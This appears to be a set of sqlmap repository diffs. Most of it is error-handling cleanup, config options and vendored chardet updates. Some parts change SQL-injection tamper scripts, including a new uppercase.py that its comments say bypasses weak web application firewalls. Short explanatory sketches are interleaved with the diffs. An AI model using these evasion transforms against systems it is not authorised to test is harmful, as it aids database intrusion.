@ -341,13 +344,13 @@ class Entries:
attackDumpedTable()
except (IOError, OSError), ex:
errMsg = "an error occurred while attacking "
errMsg += "table dump ('%s')" % ex.message
errMsg += "table dump ('%s')" % getSafeExString(ex)
logger.critical(errMsg)
conf.dumper.dbTableValues(kb.data.dumpedTable)
except SqlmapConnectionException, ex:
errMsg = "connection exception detected in dumping phase "
errMsg += "('%s')" % ex.message
errMsg += "('%s')" % getSafeExString(ex)
logger.critical(errMsg)
finally:

View File

@ -65,7 +65,7 @@ class Search:
infoMsg = "searching database"
if dbConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
logger.info(infoMsg)
@ -98,7 +98,7 @@ class Search:
if not values and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of database"
if dbConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db)
logger.info(infoMsg)
@ -113,7 +113,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no database"
if dbConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -172,7 +172,7 @@ class Search:
infoMsg = "searching table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
if dbCond and conf.db and conf.db != CURRENT_DB:
@ -225,7 +225,7 @@ class Search:
if len(whereDbsQuery) == 0:
infoMsg = "fetching number of databases with table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.info(infoMsg)
@ -236,7 +236,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no databases have table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl)
logger.warn(warnMsg)
@ -274,7 +274,7 @@ class Search:
infoMsg = "fetching number of table"
if tblConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -288,7 +288,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no table"
if tblConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)
@ -390,7 +390,7 @@ class Search:
infoMsg = "searching column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
foundCols[column] = {}
@ -468,7 +468,7 @@ class Search:
if not conf.db:
infoMsg = "fetching number of databases with tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb))
@ -479,7 +479,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no databases have tables containing column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column)
logger.warn("%s%s" % (warnMsg, infoMsgTbl))
@ -519,7 +519,7 @@ class Search:
infoMsg = "fetching number of tables containing column"
if colConsider == "1":
infoMsg += "s like"
infoMsg += "s LIKE"
infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db))
logger.info(infoMsg)
@ -533,7 +533,7 @@ class Search:
if not isNumPosStrValue(count):
warnMsg = "no tables contain column"
if colConsider == "1":
warnMsg += "s like"
warnMsg += "s LIKE"
warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column)
warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db)
logger.warn(warnMsg)

View File

@ -1,4 +1,5 @@
DROP TABLE IF EXISTS %RANDSTR1%;
# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
CREATE OR REPLACE FUNCTION %RANDSTR3%()
RETURNS VOID AS $$

View File

@ -93,10 +93,10 @@ authType =
# Syntax: username:password
authCred =
# HTTP Authentication PEM private key. Useful only if the target URL requires
# HTTP Authentication PEM private/cert key file. Useful only if the target URL requires
# PKI authentication and you have such data.
# Syntax: key_file
authPrivate =
authFile =
# Use a proxy to connect to the target URL.
# Syntax: (http|https|socks4|socks5)://address:port
@ -708,6 +708,9 @@ scope =
# Select tests by payloads and/or titles (e.g. ROW)
testFilter =
# Skip tests by payloads and/or titles (e.g. BENCHMARK)
testSkip =
# Update sqlmap.
# Valid: True or False
updateAll = False
@ -750,6 +753,10 @@ googlePage = 1
# Valid: True or False
identifyWaf = False
# Skip heuristic detection of WAF/IPS/IDS protection.
# Valid: True or False
skipWaf = False
# Imitate smartphone through HTTP User-Agent header.
# Valid: True or False
mobile = False

View File

@ -25,6 +25,7 @@ from lib.controller.controller import start
from lib.core.common import banner
from lib.core.common import createGithubIssue
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import maskSensitiveData
from lib.core.common import setPaths
@ -76,7 +77,7 @@ def main():
errMsg = "your system does not properly handle non-ASCII paths. "
errMsg += "Please move the sqlmap's directory to the other location"
logger.error(errMsg)
exit()
raise SystemExit
setPaths()
@ -119,9 +120,9 @@ def main():
cmdLineOptions.sqlmapShell = False
except SqlmapBaseException as ex:
errMsg = getUnicode(ex.message)
errMsg = getSafeExString(ex)
logger.critical(errMsg)
sys.exit(1)
raise SystemExit
except KeyboardInterrupt:
print
@ -141,6 +142,11 @@ def main():
errMsg = unhandledExceptionMessage()
excMsg = traceback.format_exc()
if "No space left" in excMsg:
errMsg = "no space left on output device"
logger.error(errMsg)
raise SystemExit
for match in re.finditer(r'File "(.+?)", line', excMsg):
file_ = match.group(1)
file_ = os.path.relpath(file_, os.path.dirname(__file__))

View File

@ -35,15 +35,9 @@ def tamper(payload, **kwargs):
'SELECT * FROM users WHERE id LIKE 1'
"""
def process(match):
word = match.group()
word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "")
return word
retVal = payload
if payload:
retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal)
retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
return retVal
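
With the helper function gone, the whole tamper boils down to a single substitution. A quick check that the simplified regex still produces the output promised by the docstring:

# Quick check of the simplified substitution (mirrors the docstring example).
import re

payload = "SELECT * FROM users WHERE id=1"
print re.sub(r"\s*=\s*", " LIKE ", payload)
# SELECT * FROM users WHERE id LIKE 1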

View File

@ -19,7 +19,7 @@ def tamper(payload, **kwargs):
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
>>> tamper("1 AND '1'='1")
'1 && '1'='1'
"1 %26%26 '1'='1"
"""
retVal = payload

46 tamper/uppercase.py Normal file
View File

@ -0,0 +1,46 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces each keyword character with upper case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that have poorly written permissive regular expressions
* This tamper script should work against all (?) databases
>>> tamper('insert')
'INSERT'
"""
retVal = payload
if payload:
for match in re.finditer(r"[A-Za-z_]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
retVal = retVal.replace(word, word.upper())
return retVal
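
The new tamper only touches words that sqlmap already knows as keywords (kb.keywords is populated at runtime from its payload data). A standalone sketch of the same idea with a hypothetical keyword set, for readers who want to try the regex logic outside of sqlmap:

# Standalone sketch of the keyword-uppercasing logic; the keyword set here is
# hypothetical, in sqlmap it comes from kb.keywords.
import re

KEYWORDS = set(("SELECT", "FROM", "WHERE", "UNION", "INSERT"))

def upper_keywords(payload):
    retVal = payload
    for match in re.finditer(r"[A-Za-z_]+", retVal):
        word = match.group()
        if word.upper() in KEYWORDS:
            retVal = retVal.replace(word, word.upper())
    return retVal

print upper_keywords("1 union select null from dual")
# 1 UNION SELECT null FROM dual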

View File

@ -3,22 +3,28 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
__version__ = "2.0.1"
__version__ = "2.3.0"
from sys import version_info
def detect(aBuf):
import universaldetector
if ((version_info < (3, 0) and isinstance(aBuf, unicode)) or
(version_info >= (3, 0) and not isinstance(aBuf, bytes))):
raise ValueError('Expected a bytes object, not a unicode object')
from . import universaldetector
u = universaldetector.UniversalDetector()
u.reset()
u.feed(aBuf)

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,12 +13,12 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
@ -26,18 +26,18 @@
######################### END LICENSE BLOCK #########################
# Big5 frequency table
# by Taiwan's Mandarin Promotion Council
# by Taiwan's Mandarin Promotion Council
# <http://www.edu.tw:81/mandr/>
#
#
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
#
# Ideal Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
@ -45,7 +45,7 @@ BIG5_TYPICAL_DISTRIBUTION_RATIO = 0.75
#Char to FreqOrder table
BIG5_TABLE_SIZE = 5376
Big5CharToFreqOrder = ( \
Big5CharToFreqOrder = (
1,1801,1506, 255,1431, 198, 9, 82, 6,5008, 177, 202,3681,1256,2821, 110, # 16
3814, 33,3274, 261, 76, 44,2114, 16,2946,2187,1176, 659,3971, 26,3451,2653, # 32
1198,3972,3350,4202, 410,2215, 302, 590, 361,1964, 8, 204, 58,4510,5009,1932, # 48
@ -921,3 +921,5 @@ Big5CharToFreqOrder = ( \
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,22 +13,23 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from mbcharsetprober import MultiByteCharSetProber
from codingstatemachine import CodingStateMachine
from chardistribution import Big5DistributionAnalysis
from mbcssm import Big5SMModel
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import Big5DistributionAnalysis
from .mbcssm import Big5SMModel
class Big5Prober(MultiByteCharSetProber):
def __init__(self):

80 thirdparty/chardet/chardetect.py vendored Normal file
View File

@ -0,0 +1,80 @@
#!/usr/bin/env python
"""
Script which takes one or more file paths and reports on their detected
encodings
Example::
% chardetect somefile someotherfile
somefile: windows-1252 with confidence 0.5
someotherfile: ascii with confidence 1.0
If no paths are provided, it takes its input from stdin.
"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import sys
from io import open
from chardet import __version__
from chardet.universaldetector import UniversalDetector
def description_of(lines, name='stdin'):
"""
Return a string describing the probable encoding of a file or
list of strings.
:param lines: The lines to get the encoding of.
:type lines: Iterable of bytes
:param name: Name of file or collection of lines
:type name: str
"""
u = UniversalDetector()
for line in lines:
u.feed(line)
u.close()
result = u.result
if result['encoding']:
return '{0}: {1} with confidence {2}'.format(name, result['encoding'],
result['confidence'])
else:
return '{0}: no result'.format(name)
def main(argv=None):
'''
Handles command line arguments and gets things started.
:param argv: List of arguments, as if specified on the command-line.
If None, ``sys.argv[1:]`` is used instead.
:type argv: list of str
'''
# Get command line arguments
parser = argparse.ArgumentParser(
description="Takes one or more file paths and reports their detected \
encodings",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
conflict_handler='resolve')
parser.add_argument('input',
help='File whose encoding we would like to determine.',
type=argparse.FileType('rb'), nargs='*',
default=[sys.stdin])
parser.add_argument('--version', action='version',
version='%(prog)s {0}'.format(__version__))
args = parser.parse_args(argv)
for f in args.input:
if f.isatty():
print("You are running chardetect interactively. Press " +
"CTRL-D twice at the start of a blank line to signal the " +
"end of your input. If you want help, run chardetect " +
"--help\n", file=sys.stderr)
print(description_of(f, f.name))
if __name__ == '__main__':
main()

View File

@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
@ -13,47 +13,63 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants
from euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO
from euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO
from gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO
from big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO
from jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO
from .euctwfreq import (EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE,
EUCTW_TYPICAL_DISTRIBUTION_RATIO)
from .euckrfreq import (EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE,
EUCKR_TYPICAL_DISTRIBUTION_RATIO)
from .gb2312freq import (GB2312CharToFreqOrder, GB2312_TABLE_SIZE,
GB2312_TYPICAL_DISTRIBUTION_RATIO)
from .big5freq import (Big5CharToFreqOrder, BIG5_TABLE_SIZE,
BIG5_TYPICAL_DISTRIBUTION_RATIO)
from .jisfreq import (JISCharToFreqOrder, JIS_TABLE_SIZE,
JIS_TYPICAL_DISTRIBUTION_RATIO)
from .compat import wrap_ord
ENOUGH_DATA_THRESHOLD = 1024
SURE_YES = 0.99
SURE_NO = 0.01
MINIMUM_DATA_THRESHOLD = 3
class CharDistributionAnalysis:
def __init__(self):
self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder())
self._mTableSize = None # Size of above table
self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail.
# Mapping table to get frequency order from char order (get from
# GetOrder())
self._mCharToFreqOrder = None
self._mTableSize = None # Size of above table
# This is a constant value which varies from language to language,
# used in calculating confidence. See
# http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html
# for further detail.
self._mTypicalDistributionRatio = None
self.reset()
def reset(self):
"""reset analyser, clear any state"""
self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made
self._mTotalChars = 0 # Total characters encountered
self._mFreqChars = 0 # The number of characters whose frequency order is less than 512
# If this flag is set to True, detection is done and conclusion has
# been made
self._mDone = False
self._mTotalChars = 0 # Total characters encountered
# The number of characters whose frequency order is less than 512
self._mFreqChars = 0
def feed(self, aStr, aCharLen):
def feed(self, aBuf, aCharLen):
"""feed a character with known length"""
if aCharLen == 2:
# we only care about 2-bytes character in our distribution analysis
order = self.get_order(aStr)
order = self.get_order(aBuf)
else:
order = -1
if order >= 0:
@ -65,12 +81,14 @@ class CharDistributionAnalysis:
def get_confidence(self):
"""return confidence based on existing data"""
# if we didn't receive any character in our consideration range, return negative answer
if self._mTotalChars <= 0:
# if we didn't receive any character in our consideration range,
# return negative answer
if self._mTotalChars <= 0 or self._mFreqChars <= MINIMUM_DATA_THRESHOLD:
return SURE_NO
if self._mTotalChars != self._mFreqChars:
r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio)
r = (self._mFreqChars / ((self._mTotalChars - self._mFreqChars)
* self._mTypicalDistributionRatio))
if r < SURE_YES:
return r
@ -78,16 +96,18 @@ class CharDistributionAnalysis:
return SURE_YES
def got_enough_data(self):
# It is not necessary to receive all data to draw conclusion. For charset detection,
# certain amount of data is enough
# It is not necessary to receive all data to draw conclusion.
# For charset detection, certain amount of data is enough
return self._mTotalChars > ENOUGH_DATA_THRESHOLD
def get_order(self, aStr):
# We do not handle characters based on the original encoding string, but
# convert this encoding string to a number, here called order.
# This allows multiple encodings of a language to share one frequency table.
def get_order(self, aBuf):
# We do not handle characters based on the original encoding string,
# but convert this encoding string to a number, here called order.
# This allows multiple encodings of a language to share one frequency
# table.
return -1
class EUCTWDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -95,16 +115,18 @@ class EUCTWDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = EUCTW_TABLE_SIZE
self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-TW encoding, we are interested
def get_order(self, aBuf):
# for euc-TW encoding, we are interested
# first byte range: 0xc4 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xC4':
return 94 * (ord(aStr[0]) - 0xC4) + ord(aStr[1]) - 0xA1
first_char = wrap_ord(aBuf[0])
if first_char >= 0xC4:
return 94 * (first_char - 0xC4) + wrap_ord(aBuf[1]) - 0xA1
else:
return -1
class EUCKRDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -112,15 +134,17 @@ class EUCKRDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = EUCKR_TABLE_SIZE
self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-KR encoding, we are interested
def get_order(self, aBuf):
# for euc-KR encoding, we are interested
# first byte range: 0xb0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xB0':
return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1
first_char = wrap_ord(aBuf[0])
if first_char >= 0xB0:
return 94 * (first_char - 0xB0) + wrap_ord(aBuf[1]) - 0xA1
else:
return -1;
return -1
class GB2312DistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
@ -129,15 +153,17 @@ class GB2312DistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = GB2312_TABLE_SIZE
self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for GB2312 encoding, we are interested
def get_order(self, aBuf):
# for GB2312 encoding, we are interested
# first byte range: 0xb0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if (aStr[0] >= '\xB0') and (aStr[1] >= '\xA1'):
return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if (first_char >= 0xB0) and (second_char >= 0xA1):
return 94 * (first_char - 0xB0) + second_char - 0xA1
else:
return -1;
return -1
class Big5DistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
@ -146,19 +172,21 @@ class Big5DistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = BIG5_TABLE_SIZE
self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for big5 encoding, we are interested
def get_order(self, aBuf):
# for big5 encoding, we are interested
# first byte range: 0xa4 -- 0xfe
# second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xA4':
if aStr[1] >= '\xA1':
return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0xA1 + 63
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if first_char >= 0xA4:
if second_char >= 0xA1:
return 157 * (first_char - 0xA4) + second_char - 0xA1 + 63
else:
return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0x40
return 157 * (first_char - 0xA4) + second_char - 0x40
else:
return -1
class SJISDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -166,22 +194,24 @@ class SJISDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = JIS_TABLE_SIZE
self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for sjis encoding, we are interested
def get_order(self, aBuf):
# for sjis encoding, we are interested
# first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe
# second byte range: 0x40 -- 0x7e, 0x81 -- 0xfe
# no validation needed here. State machine has done that
if (aStr[0] >= '\x81') and (aStr[0] <= '\x9F'):
order = 188 * (ord(aStr[0]) - 0x81)
elif (aStr[0] >= '\xE0') and (aStr[0] <= '\xEF'):
order = 188 * (ord(aStr[0]) - 0xE0 + 31)
first_char, second_char = wrap_ord(aBuf[0]), wrap_ord(aBuf[1])
if (first_char >= 0x81) and (first_char <= 0x9F):
order = 188 * (first_char - 0x81)
elif (first_char >= 0xE0) and (first_char <= 0xEF):
order = 188 * (first_char - 0xE0 + 31)
else:
return -1;
order = order + ord(aStr[1]) - 0x40
if aStr[1] > '\x7F':
order =- 1
return -1
order = order + second_char - 0x40
if second_char > 0x7F:
order = -1
return order
class EUCJPDistributionAnalysis(CharDistributionAnalysis):
def __init__(self):
CharDistributionAnalysis.__init__(self)
@ -189,12 +219,13 @@ class EUCJPDistributionAnalysis(CharDistributionAnalysis):
self._mTableSize = JIS_TABLE_SIZE
self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO
def get_order(self, aStr):
# for euc-JP encoding, we are interested
def get_order(self, aBuf):
# for euc-JP encoding, we are interested
# first byte range: 0xa0 -- 0xfe
# second byte range: 0xa1 -- 0xfe
# no validation needed here. State machine has done that
if aStr[0] >= '\xA0':
return 94 * (ord(aStr[0]) - 0xA1) + ord(aStr[1]) - 0xa1
char = wrap_ord(aBuf[0])
if char >= 0xA0:
return 94 * (char - 0xA1) + wrap_ord(aBuf[1]) - 0xa1
else:
return -1
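# A small worked example of the index arithmetic used by the get_order()
# methods above (plain arithmetic only; the byte pair is an arbitrary
# in-range EUC-KR sequence chosen for illustration):
first_char, second_char = 0xC7, 0xD1
order = 94 * (first_char - 0xB0) + (second_char - 0xA1)
assert order == 2210    # index into the EUC-KR frequency-order table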
View File
@ -25,8 +25,10 @@
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, sys
from charsetprober import CharSetProber
from . import constants
import sys
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self):
@ -41,28 +43,32 @@ class CharSetGroupProber(CharSetProber):
for prober in self._mProbers:
if prober:
prober.reset()
prober.active = constants.True
prober.active = True
self._mActiveNum += 1
self._mBestGuessProber = None
def get_charset_name(self):
if not self._mBestGuessProber:
self.get_confidence()
if not self._mBestGuessProber: return None
if not self._mBestGuessProber:
return None
# self._mBestGuessProber = self._mProbers[0]
return self._mBestGuessProber.get_charset_name()
def feed(self, aBuf):
for prober in self._mProbers:
if not prober: continue
if not prober.active: continue
if not prober:
continue
if not prober.active:
continue
st = prober.feed(aBuf)
if not st: continue
if not st:
continue
if st == constants.eFoundIt:
self._mBestGuessProber = prober
return self.get_state()
elif st == constants.eNotMe:
prober.active = constants.False
prober.active = False
self._mActiveNum -= 1
if self._mActiveNum <= 0:
self._mState = constants.eNotMe
@ -78,18 +84,22 @@ class CharSetGroupProber(CharSetProber):
bestConf = 0.0
self._mBestGuessProber = None
for prober in self._mProbers:
if not prober: continue
if not prober:
continue
if not prober.active:
if constants._debug:
sys.stderr.write(prober.get_charset_name() + ' not active\n')
sys.stderr.write(prober.get_charset_name()
+ ' not active\n')
continue
cf = prober.get_confidence()
if constants._debug:
sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf))
sys.stderr.write('%s confidence = %s\n' %
(prober.get_charset_name(), cf))
if bestConf < cf:
bestConf = cf
self._mBestGuessProber = prober
if not self._mBestGuessProber: return 0.0
if not self._mBestGuessProber:
return 0.0
return bestConf
# else:
# self._mBestGuessProber = self._mProbers[0]
View File
@ -1,11 +1,11 @@
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
@ -14,19 +14,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, re
from . import constants
import re
class CharSetProber:
def __init__(self):
@ -48,11 +50,11 @@ class CharSetProber:
return 0.0
def filter_high_bit_only(self, aBuf):
aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf)
aBuf = re.sub(b'([\x00-\x7F])+', b' ', aBuf)
return aBuf
def filter_without_english_letters(self, aBuf):
aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf)
aBuf = re.sub(b'([A-Za-z])+', b' ', aBuf)
return aBuf
def filter_with_english_letters(self, aBuf):
View File
@ -13,19 +13,21 @@
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from constants import eStart, eError, eItsMe
from .constants import eStart
from .compat import wrap_ord
class CodingStateMachine:
def __init__(self, sm):
@ -40,12 +42,15 @@ class CodingStateMachine:
def next_state(self, c):
# for each byte we get its class
# if it is first byte, we also get byte length
byteCls = self._mModel['classTable'][ord(c)]
# PY3K: aBuf is a byte stream, so c is an int, not a byte
byteCls = self._mModel['classTable'][wrap_ord(c)]
if self._mCurrentState == eStart:
self._mCurrentBytePos = 0
